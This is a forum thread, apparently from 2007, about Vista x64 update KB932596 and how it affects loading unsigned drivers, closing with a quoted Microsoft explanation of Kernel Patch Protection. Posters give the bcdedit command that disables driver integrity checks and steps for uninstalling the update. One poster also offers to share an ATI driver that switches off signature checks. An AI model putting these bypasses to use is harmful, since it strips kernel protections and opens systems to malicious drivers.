Taos, a member here and on Exetools, has posted the following warning about an update to Windows Vista 64 and Unsigned Drivers:

Do not install this update, reason? :
Be careful of the kb932596 "update" it stops the "bcdedit -set load options DDISABLE_INTEGRITY_CHECKS" option working, that a lot of vista x64 users were using to load unsigned drivers, and the associated MS KB article doesn't see fit to mention the fact that this is probably the only thing this ""update" does. KB932596 definitely breaks unsigned drivers.
If you use google, you will see a lot problems with this update.

Fortunately, he also posted a "solution":

Enter into Programs & characteristics (programas y caracteristicas) under control panel (panel de control) add/remove applications.

Then see installed updates (ver actualizaciones instaladas). Click on kb932596 and then uninstall. This will remove this bug. ;-) "

Thanks taos!

Regards,

Hehe nasty and good to know thx

That's the official line. I suppose their idea of "increased resiliency" is to us "make it harder for the user to do what she wants to her own machine"

Well there is nothing that can't be patched, its just annoying u have to do that over and over again if that part of the OS is updated.
It seems they also blocked that official signed Atsiv driver now

thx good to know!

I think, this update is response to "Purple Pill":
_http://www.symantec.com/enterprise/security_response/weblog/2007/08/driver_signing_on_vista_64_ati.html

I took a look at it, ATI left a backdoor in one of its drivers (atidsmxx.sys v3.0.502.0)
to disable signature checks instantly via DeviceIoControl.
If anybody is interested, I can upload.

Actually, MSDN Blogs says that the update in question is related to "Kernel Patch Protection" and not the ATI Driver issue. See:

http://blogs.msdn.com/windowsvistasecurity/archive/2007/08/16/driver-signing-kernel-patch-protection-and-kpp-driver-signing.aspx

"So I am reading a lot of stories that seem to have confused, or incorrectly aligned, Windows Vista driver signing and Kernel Patch Protection technologies. Whilst driver signing and KPP are complimentary, they are not conjoined.

Driver signing provides a method to better identify the author/creator of a piece of software or code so that the author/creator can be approached in the event a reliability issue, vulnerability, or malware is discovered. Signing is not designed to confirm the “intent” of signed code (i.e. good or bad), or whether exploitable bugs or malicious code is present. Malicious or exploitable kernel drivers can lead to system compromise beyond disabling of code signing controls, since kernel driver code has access to hardware as well as all programs running as the user.

"Kernel Patch Protection (KPP) helps protect code and critical structures in the Windows kernel from modification. Microsoft updates KPP periodically, based on internal and external research. You can read more about KPP here:

http://blogs.msdn.com/windowsvistasecurity/archive/2006/08/11/695993.aspx

http://www.microsoft.com/whdc/driver/kernel/64bitpatching.mspx

Perhaps the mix up is due to a confluence of events, or – put another way – the fact that we released an update to KPP at the same time that news about an ATI Driver issue appeared. The update to KPP has no relationship to the ATI driver issue or recent topics related to code signing.

These are unrelated events!

1: Microsoft issued a non-security update for Kernel Patch Protection (KPP), and an accompanying security advisory: Microsoft Security Advisory (932596)

2: Microsoft was made aware of an issue reported in an ATI driver that is potentially vulnerable. Microsoft was in contact with ATI to help address this issue and ATI have posted a fix in the v7.8 Catalyst Package that can be found here:

http://ati.amd.com/support/drivers/vista64/common-vista64.html,

http://ati.amd.com/support/drivers/vista32/common-vista32.html

I would like to highlight that the driver in question was not shipped ‘in-box’.

Russ Humphries"


Regards,